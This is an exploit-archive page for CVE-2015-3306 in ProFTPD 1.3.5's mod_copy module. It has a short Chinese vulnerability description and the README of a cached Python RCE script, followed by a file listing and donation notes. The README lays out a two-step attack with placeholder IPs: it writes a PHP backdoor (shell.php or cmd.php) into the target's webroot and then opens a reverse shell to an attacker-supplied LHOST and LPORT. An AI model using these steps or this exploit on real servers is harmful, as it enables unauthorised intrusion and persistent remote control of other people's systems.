Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2015-3306 PoC — ProFTPD mod_copy模块信息泄露漏洞

Source
Associated Vulnerability
Title:ProFTPD mod_copy模块信息泄露漏洞 (CVE-2015-3306)
Description:ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。 ProFTPD 1.3.5版本的mod_copy模块中存在安全漏洞。远程攻击者可借助site cpfr和site cpto命令利用该漏洞读取和写入任意文件。
Readme
# (m4ud) ProFTPD 1.3.5 RCE exploit CVE : 2015-3306!


    ProFTPd 1.3.5 RCE
    Usage: ProFTPD.py [options]

    Options:
      -h, --help             show this help message and exit
      -l LHOST, --lhost=LHOST
                             Local IP Required for Reverse Shell,
      -p LPORT, --lport=LPORT
                             Port Required for Reverse Shell,
      -t TARGET, --target=TARGET
                             Vulnerable Target,
      -d DIRECTORY, --dir=DIRECTORY
                             WebRoot directory to Upload Backdoor,  Default: /var/www/html
      -c COMMAND, --command=COMMAND
                             System Command,
      -f FILE, --file=FILE  
                             Backdoor Name,  Default: shell.php.
                                          
      




STEP 1 - Write Backdoor to target machine!

    Usage: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'

STEP 2 - Get Shell!!

    Usage: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242
File Snapshot

[4.0K] /data/pocs/f3ec975336c98f9d89675dfbf08123b09b4e8b44 ├── [ 34K] LICENSE ├── [4.4K] ProFTPD_1.3.5_rce.py └── [1020] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.